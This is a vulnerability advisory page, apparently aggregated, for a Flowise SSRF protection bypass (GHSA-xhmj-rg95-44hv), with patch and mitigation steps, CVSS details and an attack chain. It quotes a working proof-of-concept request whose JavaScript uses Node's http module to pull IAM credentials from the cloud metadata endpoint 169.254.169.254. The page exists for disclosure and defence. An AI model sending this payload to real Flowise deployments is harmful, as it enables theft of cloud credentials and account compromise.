GHSA-xhmj-rg95-44hv: Flowise SSRF bypass exposes

Q: Is GHSA-xhmj-rg95-44hv actively exploited?

No confirmed active exploitation of GHSA-xhmj-rg95-44hv has been reported, but organizations should still patch proactively.

Q: How to fix GHSA-xhmj-rg95-44hv?

1. Patch immediately: upgrade flowise and flowise-components to 3.1.0 which restricts allowed built-in modules in the NodeVM sandbox. 2. Network-level defense: add egress firewall rules or security group rules on the Flowise host blocking outbound connections to 169.254.169.254 (AWS/GCP/Azure metadata), 100.100.100.200 (Alibaba metadata), and all RFC-1918 ranges if internal network access is unneeded. 3. Code-level workaround if 3.1.0 is not immediately deployable: remove 'http', 'https', 'net', 'dns', 'dgram', 'tls', 'net' from the defaultAllowBuiltInDep array in packages/components/src/utils.ts and redeploy. 4. Rotate IAM credentials for any Flowise host that had HTTP_DENY_LIST configured — the protection was ineffective and credentials may have been harvested without logs. 5. Enable VPC endpoint policies or IMDSv2 enforcement (AWS) requiring a session token for metadata access, which adds friction but doesn't fully remediate. 6. Audit logs for POST /api/v1/node-custom-function containing 'require' with http/https/net/dns module references.

Q: What systems are affected by GHSA-xhmj-rg95-44hv?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI workflow automation, LLM orchestration platforms, cloud-deployed AI services, low-code AI builders.

Q: What is the CVSS score for GHSA-xhmj-rg95-44hv?

GHSA-xhmj-rg95-44hv has a CVSS v3.1 base score of 7.1 (HIGH).

CISO Take

Flowise's Custom Function node executes user-supplied JavaScript in a NodeVM sandbox where SSRF protection (HTTP_DENY_LIST) only wraps axios and node-fetch — leaving Node.js built-in http, https, and net modules completely unguarded. Any authenticated Flowise user can import require('http') in a custom function and directly query cloud metadata endpoints like AWS EC2's 169.254.169.254, stealing temporary IAM credentials with full attached-role permissions — this is a textbook cloud pivot, not a theoretical risk, and the PoC is public. The package carries 37 prior CVEs indicating systemic security debt, and Flowise is commonly deployed on cloud VMs with IAM roles for S3, Bedrock, or other AI service access, making credential theft highly impactful. Upgrade flowise and flowise-components to 3.1.0 immediately; if patching is delayed, enforce egress firewall rules blocking 169.254.169.254 and remove http/https/net from defaultAllowBuiltInDep in packages/components/src/utils.ts as a stopgap.

Sources: GitHub Advisory ATLAS CISA KEV

What is the risk?

High risk, particularly for cloud-hosted Flowise deployments with IAM roles or service accounts attached. Authentication requirement reduces exposure vs unauthenticated SSRF, but API keys in Flowise are commonly shared across teams and embedded in automation scripts, making the attacker pool larger than it appears. The false sense of security from HTTP_DENY_LIST being configured but incomplete is especially dangerous — operators who believe they have SSRF protection are actually exposed. No CISA KEV listing, no active exploitation confirmed, but the PoC is detailed and trivially reproducible. Blast radius is bounded to Flowise deployments with cloud metadata reachable from the host, but IAM credential theft cascades into full cloud account compromise.

How does the attack unfold?

Initial Access

Attacker authenticates to Flowise using a valid API key or session credential obtained through credential reuse, leak, or authorized access.

AML.T0012

SSRF Control Bypass

Attacker submits a custom JavaScript function via POST /api/v1/node-custom-function that uses Node.js built-in require('http') instead of axios/node-fetch, bypassing HTTP_DENY_LIST enforcement entirely.

AML.T0049

Metadata Service Access

The unprotected http module makes direct TCP connections to the cloud instance metadata endpoint (169.254.169.254), retrieving the IMDSv2 token and then querying attached IAM role credentials.

AML.T0075

Credential Theft & Lateral Movement

Attacker receives valid temporary AWS IAM AccessKeyId, SecretAccessKey, and session Token in the API response, then uses these credentials externally to access cloud resources (S3, Bedrock, RDS) under the victim account.

AML.T0106

Initial Access

Attacker authenticates to Flowise using a valid API key or session credential obtained through credential reuse, leak, or authorized access.

AML.T0012

SSRF Control Bypass

Attacker submits a custom JavaScript function via POST /api/v1/node-custom-function that uses Node.js built-in require('http') instead of axios/node-fetch, bypassing HTTP_DENY_LIST enforcement entirely.

AML.T0049

Metadata Service Access

The unprotected http module makes direct TCP connections to the cloud instance metadata endpoint (169.254.169.254), retrieving the IMDSv2 token and then querying attached IAM role credentials.

AML.T0075

Credential Theft & Lateral Movement

Attacker receives valid temporary AWS IAM AccessKeyId, SecretAccessKey, and session Token in the API response, then uses these credentials externally to access cloud resources (S3, Bedrock, RDS) under the victim account.

AML.T0106

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
Flowise	npm	<= 3.0.13	`3.1.0`
Flowise	npm	<= 3.0.13	`3.1.0`

How severe is it?

CVSS 3.1

7.1 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Moderate

What is the attack surface?

AV Network

AC High

PR Low

UI None

S Unchanged

C High

I High

A Low

What should I do?

6 steps

Patch immediately: upgrade flowise and flowise-components to 3.1.0 which restricts allowed built-in modules in the NodeVM sandbox.
Network-level defense: add egress firewall rules or security group rules on the Flowise host blocking outbound connections to 169.254.169.254 (AWS/GCP/Azure metadata), 100.100.100.200 (Alibaba metadata), and all RFC-1918 ranges if internal network access is unneeded.
Code-level workaround if 3.1.0 is not immediately deployable: remove 'http', 'https', 'net', 'dns', 'dgram', 'tls', 'net' from the defaultAllowBuiltInDep array in packages/components/src/utils.ts and redeploy.
Rotate IAM credentials for any Flowise host that had HTTP_DENY_LIST configured — the protection was ineffective and credentials may have been harvested without logs.
Enable VPC endpoint policies or IMDSv2 enforcement (AWS) requiring a session token for metadata access, which adds friction but doesn't fully remediate.
Audit logs for POST /api/v1/node-custom-function containing 'require' with http/https/net/dns module references.

How is it classified?

Auth Bypass Data Extraction Code Execution Agent Framework Plugin AML.T0049 - Exploit Public-Facing Application AML.T0053 - AI Agent Tool Invocation AML.T0055 - Unsecured Credentials AML.T0075 - Cloud Service Discovery AML.T0106 - Exploitation for Credential Access

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system

ISO 42001

A.6.2.3 - AI system security A.8.5 - Information security in AI system design

NIST AI RMF

GOVERN-6.1 - Organizational risk policies MANAGE-2.2 - Risk treatment

OWASP LLM Top 10

LLM07 - Insecure Plugin Design LLM08 - Excessive Agency

Frequently Asked Questions

What is GHSA-xhmj-rg95-44hv?

Flowise's Custom Function node executes user-supplied JavaScript in a NodeVM sandbox where SSRF protection (HTTP_DENY_LIST) only wraps axios and node-fetch — leaving Node.js built-in http, https, and net modules completely unguarded. Any authenticated Flowise user can import require('http') in a custom function and directly query cloud metadata endpoints like AWS EC2's 169.254.169.254, stealing temporary IAM credentials with full attached-role permissions — this is a textbook cloud pivot, not a theoretical risk, and the PoC is public. The package carries 37 prior CVEs indicating systemic security debt, and Flowise is commonly deployed on cloud VMs with IAM roles for S3, Bedrock, or other AI service access, making credential theft highly impactful. Upgrade flowise and flowise-components to 3.1.0 immediately; if patching is delayed, enforce egress firewall rules blocking 169.254.169.254 and remove http/https/net from defaultAllowBuiltInDep in packages/components/src/utils.ts as a stopgap.

Is GHSA-xhmj-rg95-44hv actively exploited?

No confirmed active exploitation of GHSA-xhmj-rg95-44hv has been reported, but organizations should still patch proactively.

How to fix GHSA-xhmj-rg95-44hv?

1. Patch immediately: upgrade flowise and flowise-components to 3.1.0 which restricts allowed built-in modules in the NodeVM sandbox. 2. Network-level defense: add egress firewall rules or security group rules on the Flowise host blocking outbound connections to 169.254.169.254 (AWS/GCP/Azure metadata), 100.100.100.200 (Alibaba metadata), and all RFC-1918 ranges if internal network access is unneeded. 3. Code-level workaround if 3.1.0 is not immediately deployable: remove 'http', 'https', 'net', 'dns', 'dgram', 'tls', 'net' from the defaultAllowBuiltInDep array in packages/components/src/utils.ts and redeploy. 4. Rotate IAM credentials for any Flowise host that had HTTP_DENY_LIST configured — the protection was ineffective and credentials may have been harvested without logs. 5. Enable VPC endpoint policies or IMDSv2 enforcement (AWS) requiring a session token for metadata access, which adds friction but doesn't fully remediate. 6. Audit logs for POST /api/v1/node-custom-function containing 'require' with http/https/net/dns module references.

What systems are affected by GHSA-xhmj-rg95-44hv?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI workflow automation, LLM orchestration platforms, cloud-deployed AI services, low-code AI builders.

What is the CVSS score for GHSA-xhmj-rg95-44hv?

GHSA-xhmj-rg95-44hv has a CVSS v3.1 base score of 7.1 (HIGH).

What is the AI security impact?

Affected AI Architectures

agent frameworksAI workflow automationLLM orchestration platformscloud-deployed AI serviceslow-code AI builders

MITRE ATLAS Techniques

AML.T0049 Exploit Public-Facing Application

AML.T0053 AI Agent Tool Invocation

AML.T0055 Unsecured Credentials

AML.T0075 Cloud Service Discovery

AML.T0106 Exploitation for Credential Access

Compliance Controls Affected

EU AI Act: Article 15, Article 9

ISO 42001: A.6.2.3, A.8.5

NIST AI RMF: GOVERN-6.1, MANAGE-2.2

OWASP LLM Top 10: LLM07, LLM08

What are the technical details?

Original Advisory

### Summary A Server-Side Request Forgery (SSRF) protection bypass vulnerability exists in the Custom Function feature. While the application implements SSRF protection via HTTP_DENY_LIST for axios and node-fetch libraries, the built-in Node.js `http`, `https`, and `net` modules are allowed in the NodeVM sandbox without equivalent protection. This allows authenticated users to bypass SSRF controls and access internal network resources (e.g., cloud provider metadata services) ### Details The vulnerability exists in the sandbox configuration within `packages/components/src/utils.ts` **Vulnerable Code - Allowed Built-in Modules (Line 56):** ```typescript export const defaultAllowBuiltInDep = [ 'assert', 'buffer', 'crypto', 'events', 'http', 'https', 'net', 'path', 'querystring', 'timers', 'url', 'zlib', 'os', 'stream', 'http2', 'punycode', 'perf_hooks', 'util', 'tls', 'string_decoder', 'dns', 'dgram' ] ``` **SSRF Protection Implementation (Lines 254-261):** ```typescript // Only axios and node-fetch are wrapped with SSRF protection secureWrappers['axios'] = secureAxiosWrapper secureWrappers['node-fetch'] = secureNodeFetch const defaultNodeVMOptions: any = { // ... require: { builtin: builtinDeps, // <-- http, https, net allowed here mock: secureWrappers // <-- Only mocks axios, node-fetch }, // ... } ``` **Root Cause:** - The `secureWrappers` object only contains mocked versions of `axios` and `node-fetch` that enforce `HTTP_DENY_LIST` - The built-in `http`, `https`, and `net` modules are passed directly to the sandbox via `builtinDeps` without any SSRF protection - Users can import these modules directly and make arbitrary HTTP requests, which completely bypasses the intended security controls **Affected File:** `packages/components/src/utils.ts` **Related Files:** - `packages/components/src/httpSecurity.ts` - Contains checkDenyList() function only used by axios/node-fetch wrappers - `packages/server/src/controllers/nodes/index.ts` - API endpoint accepting user-controlled JavaScript code - `packages/server/src/services/nodes/index.ts` - Service layer executing the code ### PoC **Prerequisites:** 1. Flowise instance with `HTTP_DENY_LIST` configured (e.g., `HTTP_DENY_LIST=127.0.0.1,169.254.169.254,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16`) 2. Valid API key or authenticated session 3. For full impact demonstration - Flowise running on AWS EC2 with an IAM role attached **Verify SSRF Protection is enabled (expect a block message by policy)** Request: ```http POST /api/v1/node-custom-function HTTP/1.1 Host: <host> Content-Type: application/json Authorization: Bearer <api_key> { "javascriptFunction": "const axios = require('axios'); return (await axios.get('http://169.254.169.254/latest/meta-data/')).data;" } ``` Response: ```json {"statusCode":500,"success":false,"message":"Error: nodesService.executeCustomFunction - Error running custom function: Error: Error: NodeVM Execution Error: Error: Access to this host is denied by policy.","stack":{}} ``` **Bypass SSRF Protection using built-in http module** Request: ```http POST /api/v1/node-custom-function HTTP/1.1 Host: <host> Content-Type: application/json Authorization: Bearer <api_key> { "javascriptFunction": "const http = require('http'); return new Promise((resolve) => { const tokenReq = http.request({ hostname: '169.254.169.254', path: '/latest/api/token', method: 'PUT', headers: { 'X-aws-ec2-metadata-token-ttl-seconds': '21600' } }, (tokenRes) => { let token = ''; tokenRes.on('data', c => token += c); tokenRes.on('end', () => { const metaReq = http.request({ hostname: '169.254.169.254', path: '/latest/meta-data/iam/security-credentials/{IAM_Role}', headers: { 'X-aws-ec2-metadata-token': token } }, (metaRes) => { let data = ''; metaRes.on('data', c => data += c); metaRes.on('end', () => resolve(data)); }); metaReq.on('error', e => resolve('meta-error:' + e.message)); metaReq.end(); }); }); tokenReq.on('error', e => resolve('token-error:' + e.message)); tokenReq.end(); });" } ``` Response: ```json { "Code": "Success", "LastUpdated": "2026-01-08T11:30:00Z", "Type": "AWS-HMAC", "AccessKeyId": "ASIA...", "SecretAccessKey": "...", "Token": "...", "Expiration": "2026-01-08T17:30:00Z" } ``` <img width="1638" height="751" alt="image" src="https://github.com/user-attachments/assets/ed8b1dfd-516f-4e2b-a4ea-4dd259a8abf6" /> <img width="1633" height="986" alt="image" src="https://github.com/user-attachments/assets/12f6ecab-96df-42bc-9551-4a005ba6ba77" /> ### Impact **Vulnerability Type:** Server-Side Request Forgery (SSRF) with security controls bypass **Who is Impacted:** - All Flowise deployments where `HTTP_DENY_LIST` is configured for SSRF protection - Deployments without `HTTP_DENY_LIST` are already vulnerable to SSRF via any method **Impact Severity:** 1. Attackers can steal temporary IAM credentials from metadata services, which allows gaining access to other cloud resources 2. Scan internal networks, discover services, and identify attack targets 3. Reach databases, admin panels, and other internal APIs that should not be externally accessible **Attack Requirements:** - Authentication required (API key or session) - Network access to Flowise instance

Exploitation Scenario

An attacker obtains a valid Flowise API key (via credential leak, insider access, or brute force of a weak key). They send a POST request to /api/v1/node-custom-function with a JavaScript payload that uses require('http') to first PUT to the IMDSv2 token endpoint (X-aws-ec2-metadata-token-ttl-seconds: 21600), retrieves the token, then GETs /latest/meta-data/iam/security-credentials/{IAM_Role_Name} with the token header. The response contains a valid AccessKeyId, SecretAccessKey, and session Token with the full permissions of the EC2 instance role. The attacker then uses these credentials externally to access S3 buckets containing training data or model artifacts, query Bedrock APIs under the victim's account, or pivot to other cloud services. This entire chain takes under 60 seconds and leaves minimal Flowise-side logs beyond the API request itself.

Weaknesses (CWE)

CWE-284 Improper Access Control Primary CWE-918 Server-Side Request Forgery (SSRF) Primary

CWE-284 — Improper Access Control: The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.

[Architecture and Design, Operation] Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.
[Architecture and Design] Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.

Source: MITRE CWE corpus.